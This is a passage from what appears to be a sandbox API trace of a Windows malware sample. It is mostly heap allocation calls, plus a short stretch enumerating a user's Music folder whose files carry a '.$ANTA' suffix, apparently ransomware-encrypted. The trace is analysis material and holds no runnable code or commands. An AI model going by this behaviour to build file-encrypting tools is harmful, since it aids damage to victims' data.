Flags=0x0, Size=0x4) returned 0x43e2350 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d70 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a450 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x428b4e8 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.503] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.503] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0113.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.503] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0113.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0113.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.504] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0113.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0113.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.504] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u")) returned 0x10 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.504] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0113.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.505] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0113.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.506] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0113.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.507] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f32a4e0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0xfbfe221, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xfbfe221, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca2b0, cFileName=".", cAlternateFileName="")) returned 0x41ac180 [0113.507] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f32a4e0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0xfbfe221, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xfbfe221, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca2b0, cFileName="..", cAlternateFileName="")) returned 1 [0113.507] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9d02ed, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xe9d02ed, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xea1c894, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x1ef0, dwReserved0=0x0, dwReserved1=0x43ca2b0, cFileName="7eNkYBcGM pJGAedeLc.mp3.$ANTA", cAlternateFileName="7ENKYB~1.$AN")) returned 1 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0113.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0113.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0113.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.508] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.508] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0113.508] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.508] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.509] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.509] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.509] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.510] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4da5b, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xeb4da5b, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xec58aaf, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x10440, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="bg_rcFiS42y.mp3.$ANTA", cAlternateFileName="BG_RCF~1.$AN")) returned 1 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0113.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 